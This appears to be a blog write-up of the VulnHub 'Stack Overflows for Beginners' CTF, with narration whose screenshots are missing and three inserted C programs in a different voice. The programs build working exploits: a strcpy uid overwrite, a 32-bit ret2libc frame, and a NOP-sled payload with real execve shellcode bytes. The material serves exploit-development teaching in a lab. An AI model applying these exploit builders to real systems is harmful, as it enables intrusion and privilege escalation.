Monday, 25 March 2019

Stack Overflows for Beginners - CTF - part 1

When I was searching for some 'new VM' at VulnHub I saw that there is a "Stack Overflows for Beginners: 1" CTF. I decided to try it...
I was surprised when I saw that we will start from... Kali :)

According to the 'readme page' we can start as the level0 user. Let's do that:

Ok, I think we should be a little bit 'familiar' with this desktop ;)

Let's open a console window to find our target binary:

So far so good, let's run the file command on the binary (sometimes you will use it during "other activities" as well ;)):

Ok, now I think it's time to open levelOne in gdb:

* before you do that, you can check your $HOME directory for a .gdbinit file:

That's good. I also like to add set pagination off:

Ok I think we are ready to go:

Checking all the calls should give an idea of how it should be done.

I copied the binary to my local Windows box to check it in IDA:

As you can see, you can change the 'hex' constant (the uid) to decimal:

Right-click and press 'H':

Now, let's see this code:

I think you are already familiar with 'those basics' ... ;) So (with a breakpoint set on strcpy, main+71 in my case):

So far so good.

Now, next guess:

Almost ;)

Cool, but we are still the level0 user (were privileges dropped?)

I decided to leave gdb and recreate the steps in the shell:

Great! :) Now we are ready to get the flag (it will be our password for the next 'level'):
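The screenshots carried the actual session, so here is an added example (my own code, not the levelOne binary) of the bug class the strcpy breakpoint is looking at: a fixed-size name buffer with a uid variable sitting right after it, an unchecked copy, and a payload that rewrites the uid. The 16-byte buffer, the starting uid 1000 and the wanted uid 1001 are assumptions for the demo; the struct pins the memory layout so the result does not depend on how the compiler orders locals, and the byte order is x86 little-endian like the CTF box. Note the "Almost" case: 16 bytes of filler alone already changes the uid (strcpy's terminating NUL lands on its low byte), just not to the value the check wants.

```c
/* Added example, not code from the CTF or the post: a levelOne-style
 * strcpy() overflow that rewrites the variable sitting after the buffer.
 * Buffer size, uid values and the copy routine are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN   16
#define LEVEL0_UID 1000u   /* assumed: uid the program starts with (0x3e8) */
#define WANTED_UID 1001u   /* assumed: uid the check wants      (0x3e9) */

struct frame {
    char name[NAME_LEN];   /* destination of the unchecked copy */
    uint32_t uid;          /* sits directly after name[] in memory */
};

/* Mimics strcpy(): copies up to and including the first NUL, no bounds
 * check. Kept out of line so the caller cannot assume the write stays
 * inside name[] (and so fortified strcpy_chk does not get in the way). */
__attribute__((noinline))
static void unsafe_copy(char *dst, const char *src)
{
    while ((*dst++ = *src++) != '\0')
        ;
}

/* Vulnerable check: returns 1 if, after the copy, uid == WANTED_UID. */
int check_access(const char *input)
{
    struct frame f;
    f.uid = LEVEL0_UID;
    unsafe_copy(f.name, input);      /* anything past 16 bytes lands in f.uid */
    return f.uid == WANTED_UID;
}

/* Builds the payload: NAME_LEN filler bytes, then the non-NUL low-order
 * bytes of WANTED_UID (little-endian). strcpy() stops at the first NUL, so
 * only those bytes plus one terminator reach uid; the top byte keeps its
 * old value, which is already 0 for both uids here. Returns the length
 * before the terminator, or 0 if `out` is too small. */
size_t build_payload(char *out, size_t cap)
{
    unsigned char b[4];
    size_t n, i;
    if (cap < NAME_LEN + 5)
        return 0;
    for (i = 0; i < 4; i++)
        b[i] = (unsigned char)(WANTED_UID >> (8 * i));
    memset(out, 'A', NAME_LEN);
    n = NAME_LEN;
    for (i = 0; i < 4 && b[i] != 0; i++)
        out[n++] = (char)b[i];
    out[n] = '\0';
    return n;
}

/* Runs the full exploit: 1 if the check passes with the built payload. */
int demo_exploit(void)
{
    char payload[NAME_LEN + 8];
    if (build_payload(payload, sizeof payload) == 0)
        return -1;
    return check_access(payload);
}

int main(void)
{
    printf("'level0' as input      -> %d\n", check_access("level0"));
    printf("16 x 'A' (the 'Almost') -> %d\n", check_access("AAAAAAAAAAAAAAAA"));
    printf("built payload           -> %d\n", demo_exploit());
    return 0;
}
```

Compile with plain gcc; no -fno-stack-protector is needed because the write stays inside the struct. Because strcpy stops at NUL, only the non-zero low-order bytes of the new value can be delivered this way, so the trick depends on the upper bytes already holding what you want.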
From here, if you want, you can (re)log in as the level1 user. We should be here, checking our new binary with file, like before:

So now (I again copied the target binary into IDA) we should be somewhere here, in the hello() function:

(As you can see, I renamed src to our_payload (press 'n' on the variable, or right-click and choose 'rename').)

Let's try this:

Ok, now back to Kali:

Now open it in gdb (and set a breakpoint at *main):

Now it should be easier. To find a string for our system() function I used:
gdb> x/100s $esp

...after we started the process with b *main. ;)


(x/200s worked better ;))

Now we need to calculate:


(this should be wrong because we are still using the SHELL variable's address as seen from inside gdb; see below)

So, checking again:


Wrong. Again Neo.

Wrong. Again.

Good. Preparing to run without gdb:

(Let's say that during a CTF a root shell means you won. But let's not cheat here; there are 3 more flags to grab:)
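The system() address, the address of the string on the stack and the buffer offset are all in the screenshots, so as an added example (mine, not the post's) here is the 32-bit ret2libc frame this level builds: filler up to the saved return address, then system()'s address, a fake return address for system() to come back to, and a pointer to a string such as the value of SHELL found with x/200s $esp. The second helper is the classic getenvaddr rule of thumb behind the 'Wrong. Again.' iterations: gdb starts the target by its absolute path, which is longer than the short name typed in a shell, and the program path is stored twice in the string area at the top of the stack (the execve pathname and bash's `_` variable), so an environment string moves by twice the length difference. gdb also adds LINES and COLUMNS to the environment, which this does not correct for; unset them (or start the binary with env -i in both places) before comparing. The addresses in main and in the test are placeholders.

```c
/* Added example, not the post's code: a 32-bit x86 ret2libc frame plus the
 * getenvaddr-style shift between gdb and a plain shell. Every address used
 * here is a made-up placeholder. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stack after the overflow (x86, 32-bit, little-endian):
 *   [offset bytes of filler][&system][return addr for system][&"/bin/sh"]
 * Returns the payload length, or 0 if `out` is too small. */
size_t build_ret2libc(unsigned char *out, size_t cap, size_t offset,
                      uint32_t system_addr, uint32_t ret_after, uint32_t arg_addr)
{
    uint32_t words[3] = { system_addr, ret_after, arg_addr };
    size_t n = offset, i, k;
    if (cap < offset + 12)
        return 0;
    memset(out, 'A', offset);
    for (i = 0; i < 3; i++)
        for (k = 0; k < 4; k++)          /* little-endian byte order */
            out[n++] = (unsigned char)(words[i] >> (8 * k));
    return n;
}

/* Reads a little-endian 32-bit word back out of a payload. */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Rule of thumb: an environment string seen at env_addr in a process that
 * was started as `observed_name` (e.g. the absolute path gdb uses) should
 * be at env_addr + 2 * (strlen(observed_name) - strlen(target_name)) when
 * the same binary is started as `target_name` with an otherwise identical
 * environment. Assumption: the program path appears twice above the
 * environment strings (execve pathname and bash's `_` variable). */
uintptr_t shift_env_addr(uintptr_t env_addr, const char *observed_name,
                         const char *target_name)
{
    long diff = (long)strlen(observed_name) - (long)strlen(target_name);
    return (uintptr_t)((long)env_addr + 2 * diff);
}

int main(int argc, char **argv)
{
    unsigned char buf[64];
    /* Placeholder values: 28-byte offset, libc system(), junk return, SHELL string. */
    size_t n = build_ret2libc(buf, sizeof buf, 28, 0xf7e3d000u, 0x41414141u, 0xffffd7c2u);
    printf("payload: %zu bytes, system() slot = 0x%08x, arg slot = 0x%08x\n",
           n, read_le32(buf + 28), read_le32(buf + 36));

    /* argv[1], if given, is the name the real target will be started as. */
    const char *shell = getenv("SHELL");
    if (shell && argc > 1)
        printf("SHELL here: %p, expected in '%s': 0x%lx\n", (const void *)shell,
               argv[1], (unsigned long)shift_env_addr((uintptr_t)shell, argv[0], argv[1]));
    return 0;
}
```

Only meaningful for a 32-bit target with ASLR off, as in the CTF VM; the shift only holds when the two environments differ in nothing but the program name, which is exactly what gdb breaks with LINES and COLUMNS.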

Cool. Switching to the level2 user. We will start here:

Should be fun. :)


Hints from x/500wx $esp:


Ok. So I think we need to overflow the variable with our new location (so that BBBB becomes the address where our CCCC shellcode starts, and we will then be able to run the shellcode...).

To generate my 'sample shellcode' I used my old script:
Checking again:

Now it looks good. Let's check the address of our shellcode again:

After a little rewrite ;) we can try x/300wx $esp again:

Again. :)

...but maybe this time I will open that 444/tcp port on my Kali box? ;)

Looks better. ;]

I think that's enough for 'part 1' of this CTF. We need to check what's going on with the last 2 flags, so stay tuned... ;)

See you next time.


(Updated at 25.03.2019 @23:30)

Ok, it's time for an update (I decided to add the last 2 challenges here rather than in a new post, so...) ;)

Let's start here, with levelFour:

Now we are here, preparing our payload:
Cool :) Last stage (because we 'already got root' ;))

Next, get the flag:

Cool. Time to check the binary:

I used shellcode from shell-storm.org (thanks!). When I saw gets() it reminded me of a CTF I played in the past:

Rewriting the payload:

Next, I rewrote my payload (a few more times... ;))

...and again...

I decided to use this address:

And the reason is:
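Both the level2 step above (overwriting BBBB with the address of the CCCC shellcode) and this last binary's gets() input come down to the same payload: a NOP sled, the shellcode, and the address to jump to written over the saved return address or pointer. Here is an added example (my own, not the post's script and not the shell-storm.org reverse shell, whose bytes are not reproduced): it assembles that layout for any shellcode, using the classic 23-byte Linux/x86 execve("/bin//sh") stub as the sample, checks that the chosen address lands inside the sled, and scans the payload for the byte that would cut it off, since strcpy() stops at 0x00 while gets() reads 0x00 fine but stops at a newline (0x0a). Offsets and addresses are placeholders; whatever the screenshot shows as the reason for the final address, this is the check worth running before settling on one.

```c
/* Added example, not the post's code: NOP sled + shellcode + target address
 * payload builder, with the bad-byte scan that differs between strcpy()
 * and gets(). Offsets and addresses are placeholders. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Classic Linux/x86 execve("/bin//sh") shellcode, 23 bytes, no NUL or LF. */
static const unsigned char SHELLCODE[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof(SHELLCODE) - 1)   /* drop the literal's NUL */

enum reader { READ_STRCPY, READ_GETS };

/* Index of the first byte that would stop the given input routine
 * (0x00 for strcpy, '\n' for gets), or -1 if the payload survives intact. */
long first_bad_byte(const unsigned char *p, size_t n, enum reader how)
{
    unsigned char stop = (how == READ_GETS) ? '\n' : '\0';
    for (size_t i = 0; i < n; i++)
        if (p[i] == stop)
            return (long)i;
    return -1;
}

/* Layout: [NOP sled][shellcode] exactly filling `target_offset` bytes (the
 * distance to the overwritten slot), then `copies` little-endian copies of
 * `target_addr`. Returns the total length, or 0 if it does not fit. */
size_t build_sled_payload(unsigned char *out, size_t cap, size_t target_offset,
                          uint32_t target_addr, unsigned copies,
                          const unsigned char *sc, size_t sc_len)
{
    if (target_offset < sc_len || cap < target_offset + 4 * copies)
        return 0;
    size_t sled = target_offset - sc_len, n = target_offset;
    memset(out, 0x90, sled);                 /* NOP sled */
    memcpy(out + sled, sc, sc_len);          /* shellcode right after it */
    for (unsigned c = 0; c < copies; c++)
        for (int k = 0; k < 4; k++)
            out[n++] = (unsigned char)(target_addr >> (8 * k));
    return n;
}

/* The jump only works if it lands inside the sled, i.e. in
 * [buf_addr, buf_addr + sled_len); landing in the shellcode itself or past
 * the buffer is a crash. buf_addr comes from the x/wx $esp dump. */
int ret_hits_sled(uint32_t buf_addr, size_t target_offset, size_t sc_len,
                  uint32_t target_addr)
{
    uint32_t sled_end = buf_addr + (uint32_t)(target_offset - sc_len);
    return target_addr >= buf_addr && target_addr < sled_end;
}

int main(void)
{
    unsigned char p[128];
    /* Placeholders: slot 76 bytes into the buffer, buffer seen at 0xffffd580. */
    uint32_t buf_addr = 0xffffd580u, candidates[2] = { 0xffffd5a0u, 0xffffd50au };
    for (int i = 0; i < 2; i++) {
        size_t n = build_sled_payload(p, sizeof p, 76, candidates[i], 1,
                                      SHELLCODE, SHELLCODE_LEN);
        printf("0x%08x: %zu bytes, in sled=%d, strcpy cut at %ld, gets cut at %ld\n",
               candidates[i], n, ret_hits_sled(buf_addr, 76, SHELLCODE_LEN, candidates[i]),
               first_bad_byte(p, n, READ_STRCPY), first_bad_byte(p, n, READ_GETS));
    }
    return 0;
}
```

To send the payload, write the bytes to a file and feed them on stdin (for gets) or pass them as the argument (for strcpy); the x86 shellcode itself only runs on a 32-bit target with an executable stack, as on the CTF VM.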

Cool :) I think it was a very nice CTF. You should try it :)

See you next time!